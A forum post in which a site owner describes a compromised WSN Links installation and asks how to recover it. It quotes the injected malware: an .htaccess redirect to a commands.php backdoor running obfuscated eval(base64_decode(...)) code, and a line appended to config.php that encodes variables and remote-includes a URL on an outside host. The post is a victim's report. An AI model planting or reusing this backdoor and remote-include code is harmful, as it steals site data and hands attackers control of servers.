| Message Text |
My links site has been hacked pretty heavily I feel.
Not to degrade the security of WSN, because I think it was through template files which were chmodded to 777.
I noticed some pretty peculiar activity in my raw access logs, calling for files that did not exist. And a name of "bdbjizzazbzeh" doing most if it.
Couple days later there are duragotive text links added to my wrapper and main tpl's. I managed to get rid of those, but after an in depth look at some of the directorys in Cpanel, these people had a blast in there.
Any directory with an htaccess, the htaccess file within points to a php file they have either created or rewrote. I'm not sure what files are WSN and what isn't anymore.
An example the htaccess file inside the includes directory reads;
Options -MultiViews
ErrorDocument 404 //includes/commands.php
And the referring commands.php reads:
<?php error_reporting(0);$s="e";$p="bdbjizzazbzeh";eval(base64_decode("Y2xhc3Mgb W0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB3aGlsZSAoIWVtcHR5K CRkYXRhKSkgeyBpZiAoc3RycG9zKCRkYXRhLCAnTG9jYXRpb246ICcpICE9P
SBmYWxzZSkgeyAkbmV3X2xvY2F0aW9uID0gdHJpbShzdHJfcmVwbGFjZSgnT G9jYXRpb246ICcsICcnLCAkZGF0YSkpOyBicmVhazsgfSAkZGF0YSA9IHJ0c mltKGZnZXRzKCR0aGlzLT5jb25uX2lkLCAzMDApKTsgfSB0cmlnZ2VyX2Vyc m9yKCR0aGlzLT5mdWxsdXJsLicgJy4kaGVhZFsyXS4nOiAnLiRuZXdfbG9jY XRpb24sIEVfVVNFUl9OT1RJQ0UpOyAkdGhpcy0+c3RyZWFtX2Nsb3NlKCk7I HJldHVybiAoJGNbJ21heF9yZWRpcmVjdHMnXSA+ICR0aGlzLT5yZWRpcmVjd HMrKyAmJiAkdGhpcy0+c3RyZWFtX29wZW4oJG5ld19sb2NhdGlvbiwgJHRoa XMtPmRlZm1vZGUsICR0aGlzLT5vcHRpb25zLCBudWxsKSAmJiAkdGhpcy0+c 3RyZWFtX2ZsdXNoKCkpOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtP mNvbm5faWQsIDEwMjQpKTsgd2hpbGUgKCFlbXB0eSgkZGF0YSkpIHsgJGh0d HBfcmVzcG9uc2VfaGVhZGVyIC49ICRkYXRhLiJcclxuIjsgaWYgKHN0cnBvc ygkZGF0YSwnQ29udGVudC1MZW5ndGg6ICcpICE9PSBmYWxzZSkgeyAkdGhpc y0+c3RhdFsnc2l6ZSddID0gdHJpbShzdHJfcmVwbGFjZSgnQ29udGVudC1MZ W5ndGg6ICcsICcnLCAkZGF0YSkpOyB9IGVsc2VpZiAoc3RycG9zKCRkYXRhL CdEYXRlOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ2F0aW1lJ10gP SBzdHJ0b3RpbWUoc3RyX3JlcGxhY2UoJ0RhdGU6ICcsICcnLCAkZGF0YSkpO yB9IGVsc2VpZiAoc3RycG9zKCRkYXRhLCdMYXN0LU1vZGlmaWVkOiAnKSAhP T0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ210aW1lJ10gPSBzdHJ0b3RpbWUoc 3RyX3JlcGxhY2UoJ0xhc3QtTW9kaWZpZWQ6ICcsICcnLCAkZGF0YSkpOyB9I CRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDEwMjQpKTsgf SBpZiAoJGhlYWRbMV0gPj0gNDAwKSB7IHRyaWdnZXJfZXJyb3IoJHRoaXMtP mZ1bGx1cmwuJyAnLiRoZWFkWzJdLCBFX1VTRVJfV0FSTklORyk7IHJldHVyb iBmYWxzZTsgfSBpZiAoJGhlYWRbMV0gPT0gMzA0KSB7IHRyaWdnZXJfZXJyb 3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLCBFX1VTRVJfTk9USUNFK TsgcmV0dXJuIGZhbHNlOyB9IHJldHVybiB0cnVlOyB9DQpmdW5jdGlvbiBzd HJlYW1fc3RhdCgpIHsgJHRoaXMtPnN0cmVhbV9mbHVzaCgpOyByZXR1cm4gJ HRoaXMtPnN0YXQ7IH0NCmZ1bmN0aW9uIGRpcl9vcGVuZGlyKCRwYXRoLCAkb 3B0aW9ucykgeyByZXR1cm4gZmFsc2U7IH0NCmZ1bmN0aW9uIGRpcl9yZWFkZ GlyKCkgeyByZXR1cm4gJyc7IH0NCmZ1bmN0aW9uIGRpcl9yZXdpbmRkaXIoK SB7IHJldHVybiAnJzsgfQ0KZnVuY3Rpb24gZGlyX2Nsb3NlZGlyKCkgeyByZ ")); ?>
My config.php file has been hit as well, and now has the following at the bottom;
$str=base64_encode($a).".".base64_encode($b).".".base64_enco de($c).".".base64_encode($g).".".base64_encode($h).".".base6 4_encode($n);if((include_once(base64_decode("aHR0cDovLw=="). "bdbjizzazbzeh".base64_decode("LnVzZXJzLnBocG luY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."[highlight =rgb(0, 255, 0);]bdbjizzazbzeh[/highlight]".base64_decode("LnVzZXJzLnBocG luY2x1ZGUucnU=")."/?".$str);}?>
I'm looking for advice at this point. Is it possible for me to download WSN links again and compare the directory structure and maybe delete the files they have created?
If I save the database and kill the rest, reinstall with the 5.0 series, will it fix me up?
Or can I over write with another install of my current version? |
